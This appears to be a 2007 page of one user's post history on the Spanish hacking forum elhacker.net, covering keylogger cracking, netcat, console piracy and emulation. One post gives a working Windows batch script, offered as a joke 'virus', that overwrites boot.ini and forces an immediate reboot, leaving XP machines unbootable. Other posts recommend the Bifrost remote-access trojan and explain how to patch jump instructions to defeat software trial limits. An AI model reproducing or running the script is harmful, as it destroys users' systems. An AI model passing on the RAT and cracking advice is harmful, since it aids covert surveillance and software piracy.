elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7 8 9 10
51  Programación / Ingeniería Inversa / Re: Crakear un Family KeyLogger en: 4 Junio 2007, 20:21 pm
No necesitas usar exactamente ese programa, puedes usar Bifrost, busca en el foro y deseguro lo encuentras :xD
52  Programación / Ingeniería Inversa / Re: Videotuto del Softice para Xp en: 16 Mayo 2007, 20:08 pm
Coloquen de manera publica como se hace... O acaso ese video esta sin compresion de codec y por eso se alcanza ese radio de compresion?. Pero de 12MB a 400MB es mucha diferencia porfaver compartir la informacion
53  Programación / Scripting / Re: Opiniones y mejoras en: 16 Mayo 2007, 00:52 am
Me he reido con este post(sin animos de ofender, yo tambien soy un "nov",  bueno no tanto),  ;D No entiendo el bat de Sirdarckat  :P....
Y con este virus dedstrtuyes cualquier Pc con XP sin que ni para que.
Código:
@echo off
cd\
echo Chorrada>boot.ini
shutdown -r -t 01 -c "Jajajajajajajajajaja"
exit
54  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Respuestas: Nuevo Ataque DDoS Get's masivos 4-5-6 Mayo 07 en: 15 Mayo 2007, 20:00 pm
 Sirdarckcat has de estar aburrido :¬¬ , y
:¬¬ :¬¬ El virus no es de elhacker.net ni se propaga con su visita ni nada, no hace falta conocer o haber visitado esta pagina para estar infectado... :¬¬ :¬¬
Él se referia a lo peculiar que és, que no tengan ni idea que estan siendo herramientas para atakar una web que en sus vidas han visto
55  Seguridad Informática / Hacking / Re: Jugando con netcat en: 9 Mayo 2007, 22:08 pm
Como puedes ver… acá mostré como hacer interactuar el netcat con un servidor y transformarlo en un anonimail XD o ftp client… también puedes hacer un consultador SQL, un bot IRC, un cliente tftp… etc etc etc… es solo cosa de imaginación

Me referia a eso :¬¬
56  Media / Juegos y Consolas / Re: Ayudenme con el emulador de DS en: 30 Abril 2007, 23:44 pm
La emulacion de NDS no esta tan tirada al perro como algunos predican yo estoy jugando algunos roms de NDS pero la verdad si son pocos y la emulacion del sonido no es buena sino atros pero algo es algo aqui hice una lista de ROms compatibles y como emularlos con No$GBA http://b.domaindlx.com/cr0n0triger/nds.html espero y te sirva eso de cr0n0triger is me

Edit: Olvidaba mencionar que la lista de roms compatibles esta desactualizada como 2 meses
57  Seguridad Informática / Hacking / Re: Jugando con netcat en: 30 Abril 2007, 22:57 pm
Tengo un problema con lo de mandar mail anonimos esto es lo que me sale...



No sé si seran los servidores DNS o mi conexion y tambien para WHK si podria continuar con lo de Jugando con Netcat porque le faltaron algunas cosas como lo del IRC
58  Media / Juegos y Consolas / Re: [Programas Para PlayStation 2] en: 25 Abril 2007, 19:18 pm
Perdonen por la pregunta pero ya que hablan de USB en PS2, para que sirve el puerto USB en la Ps2? puedo ver peliculas en la PS2? o que? cuales son sus funciones   :-[
59  Media / Juegos y Consolas / Re: Como Crakear mi Ps2 sin necesidad de abrirlo para juegos piratas :-( en: 25 Abril 2007, 19:06 pm
Es verdad que se puede comer una sardina sin abrir la lata :o ?
60  Programación / Ingeniería Inversa / Re: Estoy apuntito de tirar la toalla en: 24 Abril 2007, 22:19 pm
Este tipo de programas creo que hay que borrar el jump que dice que el tiempo paso(ja o jna) o tambien cambiar el jump que llega a la ventana de "Se acabo el tiempo del tryal", prueba en las dlls tambien que en estos de tiempo la mayoria de strings estan guardadas en las dlls
Páginas: 1 2 3 4 5 [6] 7 8 9 10
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines